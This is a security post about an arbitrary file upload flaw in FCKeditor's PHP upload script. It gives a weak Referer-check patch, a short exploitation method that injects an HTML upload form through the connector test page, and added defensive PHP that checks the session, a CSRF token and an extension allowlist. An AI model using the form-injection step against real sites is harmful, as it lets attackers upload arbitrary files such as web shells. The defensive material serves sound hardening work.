Vulnerable file: editors/fckeditor/editor/filemanager/upload/php/upload.php
The fix circulated online is:
Fix: remove the FCK editor and use a different editor,
or locate the file editors/fckeditor/editor/filemanager/upload/php/upload.php
and, below the lines
require('config.php');
require('util.php');
add the following code:
// Prevent external submission
function outsidepost()
{
    $servername = $_SERVER['SERVER_NAME'];
    // Referer header as sent by the client; may be absent
    $sub_from = @$_SERVER['HTTP_REFERER'];
    $sub_len = strlen($servername);
    // Skip the 7 characters of "http://" and take the host part
    $checkfrom = substr($sub_from, 7, $sub_len);
    if ($checkfrom != $servername) {
        echo("you don't outsidepost!");
        exit;
    }
}
outsidepost();
This prevents external submission, but it does not prevent submission from within the site.
Exploitation method:
1. Open editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
2. In the Current Folder box, enter
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
Then click Get Folders and Files and an upload form appears, through which any file type can be uploaded.
PS: If the editors directory and the upload folder are configured to return 403, 500 or 404, the exploit does not work.
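
Because the Referer comparison accepts any request that comes from a page on the same host, upload.php needs checks that do not depend on that header. The following PHP is an added example, not FCKeditor's code and not part of the original post: it assumes the application stores user_id and csrf_token in the session, and the function name check_upload and the extension allowlist are hypothetical.

```php
<?php
// Added example, not FCKeditor code. The session key 'user_id', the field
// 'csrf_token' and the extension allowlist are assumptions for illustration.
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif', 'pdf'];

function check_upload(array $session, array $post, array $file): array
{
    // 1. Require a logged-in user; the Referer header is never consulted.
    if (empty($session['user_id'])) {
        return [false, 'not authenticated'];
    }
    // 2. Per-session token proves the form was issued by the application.
    $expected = (string)($session['csrf_token'] ?? '');
    $given = $post['csrf_token'] ?? '';
    if ($expected === '' || !is_string($given) || !hash_equals($expected, $given)) {
        return [false, 'bad token'];
    }
    // 3. PHP must report a completed upload.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return [false, 'upload error'];
    }
    // 4. Allowlist on the final extension, compared case-insensitively.
    $ext = strtolower(pathinfo((string)($file['name'] ?? ''), PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return [false, "extension '$ext' not allowed"];
    }
    // 5. Store under a server-chosen name so no client-supplied name part
    //    (for example an inner ".php") reaches the filesystem.
    return [true, bin2hex(random_bytes(16)) . '.' . $ext];
}

// Constructed sample requests (not real traffic).
$token = bin2hex(random_bytes(16));
$session = ['user_id' => 42, 'csrf_token' => $token];
$png = ['name' => 'photo.PNG', 'error' => UPLOAD_ERR_OK];
$php = ['name' => 'page.php', 'error' => UPLOAD_ERR_OK];
$cases = [
    'no session' => [[], ['csrf_token' => $token], $png],
    'no token' => [$session, [], $png],
    'script file' => [$session, ['csrf_token' => $token], $php],
    'image' => [$session, ['csrf_token' => $token], $png],
];
foreach ($cases as $label => [$s, $p, $f]) {
    [$ok, $info] = check_upload($s, $p, $f);
    printf("%-12s %s (%s)\n", $label, $ok ? 'ACCEPT' : 'REJECT', $info);
}
```

Only the last case is accepted; the upload directory should additionally be configured so the web server does not execute scripts from it.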